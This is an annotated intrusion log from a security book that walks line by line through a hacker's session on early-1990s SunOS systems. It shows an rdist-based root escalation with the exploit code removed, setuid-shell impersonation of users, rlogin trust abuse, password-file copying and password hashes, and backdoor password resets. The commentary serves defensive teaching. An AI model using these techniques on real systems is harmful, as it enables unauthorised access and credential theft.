What the Hacker Was Doing | IT Security: Risking the Corporation

What the Hacker Was Doing…

Line #1

When this hacker broke into the system in December, he used a guest account set up without a password. After he broke in, he assigned his own password to the guest account and to the account called "ingres," so he would have easy login access next time around.

Line #2

The "who" command checks to see whether anyone else is logged on. Our friend doesn't want anyone on the system to notice him.

Line #5

This line copies a communications program called "kermit" to the hacker's current working directory. Then he can use kermit to transfer the security tools that he will use to gain access to systems and data. Note that most hackers transfer their own security tools to simplify their work. Some hackers know little to nothing about operating systems; they just employ tools written by people who do.

Lines #6 to 25

Now the hacker is exploiting a known bug to gain root access to the system. (The hacker writes some code to overflow a buffer in rdist and then sends commands to rdist that get executed.) If the system had been properly patched, this wouldn't be possible!

 1 valley% sh 2 $ who 3 ingres   ttyp0   Jan 18 23:02 4 root    ttyp2   Jan 15 18:38   (canyon) 5 $ cp /home2/jeff/bin/kermit.orig kermit 6 $ kermit 7 C-Kermit 5A(178) ALPHA, 29 Jan 92, SUNOS 4.1 (BSD) 8 Type ? or HELP for help 9 C-Kermit>rece fi 10 Escape back to your local Kermit and give a SEND command... 11 # N3 12 0 Yz* @-#Y1~N! y- 13 %!YfiO 14 #"Y@ 15 ##YA 16 #$YB 17 #%YC 18 #&YD 19 C-Kermit> 20 Stopped 21 valley% sh 22 Stopped (signal) 23 valley% sh 24 overflows buffer here (removed for security) 25 $ /tmp/sh

Lines #26 to 27

The hacker now has root access. He's in! He sets the mode and permissions and changes the name to something he's not likely to forget. Notice that he removes the /tmp/sh file, since he doesn't want to leave any evidence of his visit.

Line #28

He misspells a command.

Line #29 to 45

He issues the ls (list) command with -t (time) specified to obtain a directory listing with the newest files listed first. The files are listed.

Lines #46 to 48

Just checking again to make sure he doesn't have company. Most hackers continue to check the system for other logins for the duration of their attacks.

Line #49

Here he's using the grep command to find the string "est". (The -i option tells UNIX that either upper- or lowercase characters are OK.) Presumably, the hacker's looking for logins from the DNS domain of ".West". (If you're not familiar with UNIX, "grep" is a common command that stands for Grab Regular ExPression. Basically, you can use grep to search a system for any occurrences of a specified string within files on that system.)

 26 # rm /tmp/sh 27 rm: override protection 755 for /tmp/sh? y 28 # lsll 29 # ls -tal 30 total 1049 31 drwxr-xr-x  4 ingres        512 Jan 18 23:04 . 32 -rwsrwsrwx  1 root        24576 Jan 18 23:04 suck 33 -rw-r--r--  1 root          61 Jan 18 23:04 c.c 34 -rwxr-xr-x  1 ingres     442368 Jan 18 23:03 kermit 35 -rwxrwxrwx  1 ingres     360448 Jan 16 11:02 testit 36 drwxr-xr-x 30 root        1024 Dec 18 20:27 .. 37 -rw-r--r--  1 ingres      1148 Jun  9  1992 foo 38 drwxrwsrwx  6 ingres      6144 Aug 23  1991 SERVICE 39 -rwxr-xr-x  1 ingres    106496 Feb 25  1991 sun4_lookup 40 -rwxr-xr-x  1 ingres     98304 Feb 25  1991 sun3_lookup 41 drwxr-xr-x  3 ingres      512 Jan 23  1991 quoter 42 -rw-r--r--  1 ingres        306 Nov 20  1987 .cshrc 43 -rw-r--r--  1 ingres       1159 Nov 20  1987 .install 44 -r--r--r--  1 ingres           20 Nov 20  1987 .version 45 -rw-r--r--  1 ingres         36 Jan 26  1987 .oemstring 46 # who 47 ingres   ttyp0   Jan 18 23:02 48 root     ttyp2   Jan 15 18:38   (canyon) 49 # last | grep -i est

Lines #50 to 57

Now he's looking for someone specific "lorin." Apparently, "lorin" hasn't logged in since the last time the hacker broke in and deleted the log files (on January 16). He tries to grep for "lorin" in /etc/passwd, but mistypes the command. Then, he remembers that the user name he's thinking of is "lorimo" not "lorin." Obviously, this guy's been here before.

Lines #58 to 61

The intruder re-edits a C program to change his user ID to 21477. The new setting allows him to switch user to "lorimo."

Lines #62 to 66

More typos. This guy could use a good typing tutor.

Lines #67 to 75

Here the hacker compiles a new version of his exploit code, sending the results (a.out) to another name he will not forget (he's got a great vocabulary). By executing two of his exploit scripts, he changes his user ID.

 50 # last lorin 51 wtmp begins Sat Jan 16 11:37 52 # grep lor /etc/passwwd 53 grep: /etc/passwwd: No such file or directory 54 # grep lor /etc/passwd 55 # ypcat passwd | grep lor 56 lori:N.4Pgz4iUS8kk:5734:50:Lori:/home/lori:/bin/csh 57 lorimo:xxYTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh 58 # ed c.c 59 /uid/ 60 setuid(0); 61 setuid(21477); 62 # cc .cc 63 cc: Warning: File with unknown suffix (.cc) passed to ld 64 ld: .cc: No such file or directory 65 # cc `c 66 > ^C 67 # cc c.c 68 # mv a.out shit 69 # chmod 6777 shit 70 # ./suck 71 # id 72 uid=0(root) gid=0(wheel) groups=7 73 # ./shit 74 $ id 75 uid=21477(lorimo) gid=0(wheel) groups=7

Lines #76 to 88

Now he's looking for new places to go by issuing rlogin commands to other systems on which lorimo might be trusted (.rhosts files and /etc/ hosts.equiv are used to set up trust between systems). If lorimo is trusted on other systems, the hacker will be granted access to those systems without having to enter a password. This is called "door rattling." If he is successful, it will give him access to more information and new places to launch attacks from in the future.

Line #89

The hacker changes his identity back to the superuser (root).

Lines #90 to 92

He looks over his shoulder again (hence the "who" command), then double-checks that he's got the user ID information correct.

Lines #93 to 94

The hacker looks for lorimo in the NIS password map.

Line #95

The hacker changes to the directory /home.

 76 $ rlogin tsunami 77 Password: 78 Login incorrect 79 Login incorrect 80 login: ^D 81 Connection closed. 82 $ rlogjn suntzu 83 rlogjn: not found 84 $ rlogin suntzu 85 Password: 86 Login incorrect 87 login: ^D 88 Connection closed. 89 $ ^D 90 # who 91 ingres   ttyp0   Jan 18 23:02 92 root     ttyp2   Jan 15 18:38   (canyon) 93 # ypcat passwd | grep lorimo 94 lorimo:xxYTF8y3fSqGo:21477:50:Lori :/home/lorimo:/bin/csh 95 # cd /home

Line #96

The hacker starts a background job to search for .rhost entries in /home. The logic behind this search is that some people using the .rhost file (for trust) may have multiple .rhost entries around the network. While this job is running, he moves on.

Line #97 to 98

More hacker typos.

Lines #99 to 100

Our friend has had enough of being lorimo. He checks the password file for jeff. He decides to impersonate jeff. First, however, he must edit his code.

Lines #101 to 113

He tries to edit his code, but he is in the wrong directory. He switches to the right directory edits the code, executes the code, and becomes the user jeff.

Lines #114 to 119

Becoming jeff was a good choice. The hacker logs into a new system (tsunami) without even needing a password. (This is an excellent example of how having one system trust another can be very dangerous.)

 96 # find . -name .rhosts -print & 97 # gupr 98 # grep^C 99 # ypcat passwd | grep jeff 100 jeff:wW/q0t03L6xO.:13147:50:Jeff :/home/jeff:/bin/csh 101 # ed c.c 102 ?c.c: No such file or directory 103 # cd 104 # ed c.c 105 /uid/ 106 setuid(21477); 107 setuid(13147); 108 # cc c.c 109 # mv a.out shit 110 # chmod 6777 shit 111 # ./shit 112 $ id 113 uid=13147(jeff) gid=0(wheel) groups=7 114 $ rlogj tsunami 115 rlogj: not found 116 $ rlogin tsunami 117 No directory!  Logging in with home=/ 118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 1992 119 You have new mail.

Lines #120 to 126

The hacker (who is now the user jeff) sets his shell to sh to foil any csh .history logs. (The hacker is being careful not to leave evidence of his commands behind.) Then he checks to see who else is logged onto the system.

Lines #127 to 136

The hacker tries to copy the password file and gets permission denied because he does not have permission to copy into that directory. He checks to see who he is logged in as (he must have forgotten). He sees he is logged in as Jeff. Since Jeff does not have permission to copy files to that directory, the hacker changes to the /tmp directory where any user has permission to copy files to.

Lines #137 to 141

He's stretching his wings a bit here, looking for password maps to copy and explore. (He copies the NIS password file to a file called "aaa".) Hackers often copy password files in order to subject them to password crackers and obtain more passwords. The more passwords a hacker has, the better his odds of raiding other systems.

 120 tsunami% ^C 121 tsunami% sh 122 $ who 123 wendy    ttyp2   Jan  6 13:55   (arawana) 124 derek    ttyp3   Jan 13 17:57   (lajolla) 125 derek    ttyp4   Jan 15 13:11   (lajolla) 126 jeff     ttyp5   Jan 18 23:09   (valley) 127 $ cat /etc/passwd^C 128 $ ypcaty^C 129 $ ypcat passwd > suna 130 suna: Permission denied 131 $ id 132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff) 133 $ pwd 134 $ cd 135 $ pwd 136 $ cd /tmp 137 $ ypcat passwd > aaa 138 $ ls -tal aa 139 aa not found 140 $ ls -tal aaa 141 -rw-r--r--  1 jeff        15382 Jan 18 23:09 aaa

Lines #142 to 162

Now he starts an ftp session back to the original host (valley) as user ingres. In that session, he copies the password file to the system valley. In the same session, he copies his security tools from valley to tsunami.

Lines #163 to 173

Once again, he re-creates his small C program (again omitted for security reasons) to exploit a security bug to obtain superuser access (root). He now has full control (root access) of system tsunami.

 142 $ ftp valley 143 Connected to valley 144 220 valley FTP server (SunOS 4.1) ready. 145 Name (valley:jeff): ingres 146 331 Password required for ingres. 147 Password: 148 230 User ingres logged in. 149 ftp> send aaa 150 200 PORT command successful. 151 150 ASCII data connection for aaa 152 226 ASCII Transfer complete. 153 local: aaa remote: aaa 154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s) 155 ftp> get foo 156 200 PORT command successful. 157 150 ASCII data connection for foo 158 226 ASCII Transfer complete. 159 local: foo remote: foo 160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s) 161 ftp> quit 162 221 Goodbye. 163 $ cat foo | /usr/ucb/rdist -Server localhost 164 $ /tmp/sh 165 # rm foo 166 # rm /tmp/sh 167 rm: override protection 755 for /tmp/sh? y 168 # ed c.c 169 # cc c.c 170 # chmod 6777 a.out 171 # ./a.out 172 # id 173 uid=0(root) gid=0(wheel) groups=50(lastaff)

Lines #174 to 182

The hacker looks to see if there are any password.old entries or other changes to the /etc/passwd file. The hacker also tries to change jeff's NIS password without success.

Lines #183 to 197

This time, he lists the contents of the /etc/passwd file.

 174 # ls -tal /etc/*ass* 175 -rw-r--r--  1 root          634 Dec  7 12:31 /etc/passwd 176 # cat /etc/}4^U 177 passwd 178 cat: /etc/}4: No such file or directory 179 Changing NIS password for jeff on suntzu. 180 Old password: 181 New password: 182 Password unchanged. 183 # cat /etc/passwd 184 root:R7QCfnYR4gvzU:0:1:Operator:/:/bin/csh 185 nobody:*:65534:65534::/: 186 daemon:*:1:1::/: 187 sys:*:2:2::/:/bin/csh 188 bin:*:3:3::/bin: 189 uucp:*:4:8::/var/spool/uucppublic: 190 news:*:6:6::/var/spool/news:/bin/csh 191 ingres:*:7:7::/usr/ingres:/bin/csh 192 audit:*:9:9::/etc/security/audit:/bin/csh 193 sync::1:1::/:/bin/sync 194 sysdiag:*:0:1:Old System Diag:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag     sundiag:*:0:1:System Diag:/usr/diag/sundiag:/usr/diag/sundiag/ sundiag 195 operator:lNtDk7crIdKh2:5:5:Account forbackups:/usr/ backup:/bin/csh 196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh 197 +::0:0:::

Lines #198 to 209

The hacker changes his user ID from superuser back to jeff. Then, he rechecks his user ID and proceeds to rename his a.out to a name he won't forget (just like before). Again, he runs an ls -t command to list the newest files first.

Lines #210 to 212

He removes his local copy of the NIS password file ("aaa"). He's already copied the file back to host valley, so he doesn't need it here. Then, he removes his exploit code and is ready to move on.

Lines #213 to 227

The hacker checks to see which filesystems are mounted.

 198 # ^D 199 # id 200 uid=4401(jeff) gid=50(lastaff) euid=0(root) groups=50(lastaff) 201 # mc^C 202 # mv .^C 203 # mv a.out shit 204 # ls -tal 205 total 2415 206 drwxrwsrwx  3 bin          1024 Jan 18 23:12 . 207 -rwsrwsrwx  1 root        24576 Jan 18 23:11 shit 208 -rw-r--r--  1 root           61 Jan 18 23:11 c.c 209 -rw-r--r--  1 jeff        15382 Jan 18 23:09 aaa 210 # rm aaa 211 # rm c.c 212 rm: override protection 644 for c.c? y 213 # df 214 Filesystem   kbytes    used   avail capacity  Mounted on 215 /dev/sd0a    10483    5081    4354    54%    / 216 /dev/sd0g    96943   78335    8914    90%    /usr 217 /dev/sd0e    22927    3111   17524    15%    /var 218 /dev/sd1h    1255494 1081249   48696   96%    /home 219 /dev/sd3h    1255494 1030386   99559   91%    /home/se 220 la:/usr/local  2097151 1154033  692365 63%   /usr/local 221 suntzu:/var/spool/mail 222 445852  334295   66972    83%    /var/spool/mail 223 mfp:/home/sybase 318991  244337  42755  85% /home/sybase 224 app1:/export/sun/sun4/openwin-3.0 225 189858  131073   39799    77%    /usr/openwin 226 app1:/export/apps 1255494 771887 358057 68% /export/apps 227 app1:/export/apps 1255494 771887 358057 68% /usr/local

Lines #228 to 229

More typos or possible line noise.

Lines #230 to 258

The hacker looks for user home directories, finds wendy's home directory, and becomes user wendy. That's short-lived, because for some reason the hacker decides to look for the user dan. Presumably, the hacker already knows that dan exists.

 228 # irG~cd /home/se 229 irG~cd: not found 230 # cd /home/se 231 # ls 232 cmeyer      hamant      lost+found  mikec       wendy 233 colleen     joseph      mark        mikep 234 derek       kevin       matthews    neally 235 # cd wendy 236 # cp /tmp/shit . 237 # ls -tal shit 238 -rwxr-xr-x  1 root        24576 Jan 18 23:13 shit 239 # chmod 6777 shit 240 # ls -tal shit 241 -rwsrwsrwx  1 root        24576 Jan 18 23:13 shit 242 # pwd 243 /home/se/wendy 244 # cd /tmp 245 # ls -tal | more 246 total 2398 247 drwxrwsrwx  3 bin          1024 Jan 18 23:13 . 248 -rwsrwsrwx  1 root        24576 Jan 18 23:11 shit 249 -rwxr-xr-x  1 cmeyer         41 Jan 13 12:31 junk 250 -rw-r--r--  1 cmeyer         12 Jan 13 12:05 junk.dat 251 -rw-r--r--  1 derek           0 Jan 12 16:07 6310 252 (16 lines of output was deleted and the hacker becomes the user wendy) 253 hacker typos 254 # rm shit 255 # grep dan/etc/passwd 256 # ypcat passwd | grep dan 257 danf:*:13602:50::/home/guest/danf:/bin/csh 258 dan:*H.6HaoIt2xDu2:13601:50:& :/home/guest/dan:/bin/csh

Lines #259 to 263

More nervous glances (with "who").

Lines #264 to 273

He goes back to being jeff. Apparently, the real jeff gets around quite a bit since the hacker now logs onto suntzu as jeff. Again, no password is required.

Line #274

Another shell change to avoid leaving his mark in the history logs.

Lines #275 to 281

The hacker checks to make sure that /home/se is mounted from host tsunami. (If you remember, /home/se/wendy is where he left his exploit code. He'll need that to gain root access to this new host.)

 259 # who 260 wendy    ttyp2   Jan  6 13:55   (arawana) 261 derek    ttyp3   Jan 13 17:57   (lajolla) 262 derek    ttyp4   Jan 15 13:11   (lajolla) 263 jeff     ttyp5   Jan 18 23:09   (valley) 264 # ^D 265 $ id 266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff) 267 $ rlogin suntzu 268 Last login: Thu Jan 14 06:35:30 on ttyh1 269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 1992 270 You have new mail. 271 suntzu% who 272 jeff     ttyp0   Jan 18 23:14 273 (tsunami) 274 suntzu% sh 275 $ df 276 Filesystem  kbytes    used     avail  capacity  Mounted on 277 /dev/sd6a   14983     11056    2429   82%       / 278 /dev/sd6g   91998     76365    6434   92%       /usr 279 /dev/sd6h   445852    334297   66970  83%       /var 280 /dev/sd4c   1255494   1030410  99535  91%       /home/se 281 tsunami:/home/se   1255494  1030410  99535  91% /tmp_mnt/home/se

Lines #282 to 287

The hacker uses his exploit code and gains root access on the system suntzu. This makes three systems he's compromised so far.

Lines #288 to 292

He is looking for passwords again. (Is this starting to seem familiar?)

Lines #293 to 317

The hacker changes to the guest home directory and lists the contents. He notices a file in a home directory called dan/test.

Line #318

I've removed several lines to protect confidentiality.

 282 $ cd /home/se/wendy 283 $ ls -tal shit 284 -rwsrwsrwx  1 root  24576 Jan 18 23:13 shit 285 $ ./shit 286 # id 287 uid=0(root) gid=0(wheel) groups=50(lastaff) 288 # ls -tal /etc/*ass* 289 -rw-r--r--  1 root  15465 Jan 15 14:29 /etc/passwd 290 -rw-r--r--  1 root  15462 Dec 28 17:58 /etc/passwd.OLD 291 -rw-r--r--  1 root  15514 Nov 12 18:58 /etc/passwd.old 292 -rw-r--r--  1 root  15215 Sep  9 10:02 /etc/passwd~ 293 # cd /home/guests 294 /home/guests: bad directory 295 # cd /home/guest 296 # ls -tal 297 total 56 298 dr-xr-xr-x 10 root          512 Jan 18 23:15 .. 299 drwxr-xr-x  9 guest1       1024 Jan 15 16:21 guest1 300 drwxr-xr-x 11 mary         1536 Jan 14 17:37 mary 301 drwxr-xr-x  5 jeffs         512 Jan 12 15:57 jeffs 302 drwxr-xr-x  3 eddie         512 Jan  8 13:04 eddie 303 drwxr-xr-x  3 sunwise       512 Jan  8 09:36 sunwise 304 drwxrwxrwx  3 brad          512 Jan  6 15:43 dan 305 # ls -tsl dan 306 total 1450 307 1 -rw-r--r--  1 65534          34 Jan  6 15:43 test 308 264 -rw-r--r--  1 dan 255563 Jul  8  1992 packet.dat 309 56 -rwxr-xr-x  3 dan 57344 Jul  1  1992 sz 310 56 -rwxr-xr-x  3 dan 57344 Jul  1  1992 sx 311 56 -rwxr-xr-x  3 dan 57344 Jul  1  1992 sb 312 40 -rwxr-xr-x  3 dan 40960 Jul  1  1992 rx 313 40 -rwxr-xr-x  3 dan 40960 Jul  1  1992 rb 314 40 -rwxr-xr-x  3 dan 40960 Jul  1  1992 rz 315 896 -rw-rw-rw-  1 dan 901682 Jun 16  1992 junk.2 316 1 drwxr-xr-x  2 dan 512 Oct 25  1990 doswin 317 # cat dan/test 318 code removed for security reasons

Line #319

Now the hacker's looking for the person with UID 65534. This turns out to be the user ID for "nobody."

Lines #320 to 393

Here, he's looking for other users on this system. He's particularly interested in user accounts that haven't been used recently, since no one is likely to notice him using such accounts. To find inactive accounts, the hacker looks for directories with no recent file accesses. He also checks the last times that users were logged into the system.

 319 # grep 65534 /etc/passwd 320 # cd /home/se 321 # ls -tal 322 total 44 323 dr-xr-xr-x 10 root          512 Jan 18 23:15 .. 324 drwxr-xr-x 17 wendy        2560 Jan 18 23:13 wendy 325 drwxr-xr-x 26 hamant       4608 Jan 18 17:28 hamant 326 drwxr-xr-x 48 neally       9728 Jan 18 11:03 neally 327 drwxr-xr-x 41 derek        3584 Jan 16 03:16 derek 328 drwxr-xr-x 17 kevin        2048 Jan 15 17:04 kevin 329 drwxr-xr-x 31 mark         3072 Jan 15 16:41 mark 330 drwxr-xr-x 19 colleen      1536 Jan 15 16:15 colleen 331 drwxr-xr-x 44 matthews     4608 Jan 15 11:37 matthews 332 drwxr-xr-x 16 mikep        1536 Jan 15 11:24 mikep 333 drwxr-xr-x  2 10406         512 Dec  2 11:35 mikec 334 drwxr-xr-x 24 cmeyer       2048 Dec  1 11:11 cmeyer 335 drwxr-xr-x 15 root          512 Sep 15 17:04. 336 drwxr-xr-x  8 5542         1536 Aug 28 15:13 joseph 337 drwxr-xr-x  2 root          512 Jul 17  1991 lost+found 338 # last | grep eric 339 ericz     ttyh1        Mon Jan 18 08:30 - 08:32  (00:02) 340 ericz     ttyh1  Aug 30 14:25 - 14:25  (00:00) 341 ericz     ttyh1    ^C 342 # id 343 uid=0(root) gid=0(wheel) groups=50(lastaff) 344 # grep eric /etc/passwd 345 Uace:LEkQ/KdKGcyV2:4:4:ACE:/usr/spool/uucppublic: /usr/ lib/uucp/uucico 346 Uaim:93uUCUdUU6zdI:4:4:AIM:/usr/spool/uucppublic: /usr/ lib/uucp/uucico 347 ericz:vt0R/k7x2W1kY:3063:50::/home/region3/ericz:/bin/csh 348 ericc:23JjW1a5hqUSQ:4094:10:& :/home/guest/eric:/bin/csh 349 # last ericc 350 ericc  ttyp1    ptero Mon Aug  3 18:52 - 18:52  (00:00) 351 wtmp begins Wed Jul  1 18:46 352 # last richp 353 richp     ttyp0    awe Sat Jan 16 19:33 - 19:34  (00:00) 354 richp     ttyp4    vela Mon Jan 11 15:59 - 16:00  (00:00) 355 richp     ttyp8    vela Wed Oct  7 13:28 - 13:58  (00:29) 356 richp     ttyh1    Mon Oct  5 15:39 - 15:41  (00:01) 357 richp     ttyh1    Mon Oct  5 14:15 - 14:18  (00:02) 358 richp     ttyh1    Mon Oct  5 13:54 - 13:58  (00:03) 359 richp     ttyp3    vela Mon Oct  5 09:43 - 09:44  (00:00) 360 richp     ttyh1    Wed Sep 30 17:57 - 17:57  (00:00) 361 richp     ttyp2    vela Tue Sep 29 14:31 - 14:32  (00:00) 362 richp     ttyh1    Thu Sep 24 13:48 - 13:51  (00:02) 363 richp     ttyp1    valley Wed Sep 23 19:47 - 19:48 (00:00) 364 richp     ttyh1    Wed Sep 23 13:28 - 13:48  (00:20) 365 richp     ttyh1    Mon Sep 21 11:27 - 11:29  (00:02) 366 richp     ttyp6    vela Fri Sep  4 09:15 - 09:16  (00:01) 367 richp     ttyp5    vela Thu Sep  3 12:31 - 13:00  (00:28) 368 richp     ttyp5    vela Thu Sep  3 12:11 - 12:11  (00:00) 369 richp     ttyp5    vela Thu Sep  3 11:42 - 11:43  (00:00) 370 richp     ttyp5    vela Thu Sep  3 10:01 - 10:04  (00:02) 371 wtmp begins Wed Jul  1 18:46 372 # last lwake 373 lwake   ttyp2  runcible Tue Dec 1 15:00 - 15:06  (00:06) 374 lwake   ttyp3  runcible Wed Sep 30 13:01 - 13:15  (00:13) 375 lwake   ttyp2  runcible Tue Sep 22 09:12 - 09:14  (00:02) 376 lwake   ttyp2  runcible Fri Jul 24 14:40 - 14:40  (00:00) 377 lwake   ttyp4  runcible Fri Jul 17 09:13 - 09:14  (00:00) 378 lwake   ttyp4  runcible Fri Jul 17 09:12 - 09:13  (00:00) 379 lwake   ttyp2  runcible Mon Jul 13 16:56 - 17:02  (00:05) 380 wtmp begins Wed Jul  1 18:46 381 # last eggers 382 eggers  ttyp0  sunkist Thu Jan  7 06:40 - 06:40  (00:00) 383 eggers  ttyh1         Mon Nov 16 16:41 - 16:42  (00:00) 384 eggers    ttyp1    bike Mon Nov 16 16:37 - 16:41  (00:03) 385 eggers    ttyp1    bike Thu Nov 12 18:35 - 18:39  (00:03) 386 eggers    ftp      bike Wed Oct  7 12:58 - 13:03  (00:05) 387 eggers    ttyp8    bike Wed Oct  7 12:53 - 13:03  (00:10) 388 eggers    ttyp1    bike Tue Oct  6 14:14 - 15:27  (01:13) 389 eggers    ttyp1    bike Wed Sep 23 16:25 - 16:30  (00:05) 390 eggers    ttyp1    bike Tue Sep 15 20:34 - 20:36  (00:01) 391 eggers    ttyh1         Fri Sep 11 18:39 - 18:39  (00:00) 392 eggers    ttyh1        Fri Sep 11 18:11 - 18:21  (00:10) 393 eggers    ttyh1        Fri Sep 11 17:52 - 18:01  (00:08)

Lines # 394 to 426

At this point, our friend is getting ready to leave. But first, he sets new passwords to the dormant accounts he's been using. This step will make his next break-in here much easier. (This is why you always need to set new passwords after a break-in!)

Lines #427 to 431

Enough for one day. Our unwanted guest covers his tracks (not shown for security reasons) and logs out.

 394 # passwd ericc 395 Changing password for ericc on suntzu. 396 New password: 397 Retype new password: 398 # grep lori /etc/passwd 399 lori:FAJEq1YKw4p7.,0:5734:50:Lori:/home/guest/lori:/bin/csh 400 # pwd 401 /tmp_mnt/home/se/wendy 402 # cd /home/guests 403 /home/guests: bad directory 404 # cd /home/guest 405 # ls -tal lori 406 total 10 407 drwxr-xr-x 52 root         1024 Sep 12 14:25 .. 408 drwxr-xr-x  3 lori          512 Aug  9 18:46 . 409 -rw-r--r--  1 lori         1262 Aug  9 18:46 .l123set,v1.1 410 drwxr-xr-x  2 lori          512 Aug  8 17:45 .dist 411 -rw-r--r--  1 lori         1457 Jun  7  1991 .login 412 -rw-r--r--  1 lori         2687 Jun  7  1991 .cshrc 413 # last lori 414 wtmp begins Wed Jul 1 18:46 415 # passwd ericc 416 Changing password for ericc on suntzu 417 New password: 418 Retype new password: 419 # passwd lori 420 Changing password for lori on suntzu 421 New password: 422 Retype new password: 423 # passwd jeff 424 Changing password for jeff on suntzu 425 New password: 426 Retype new password: 427 # ^ D 428 $ ^D 429 valley% ^D 430 There are stopped jobs 431 valley% logout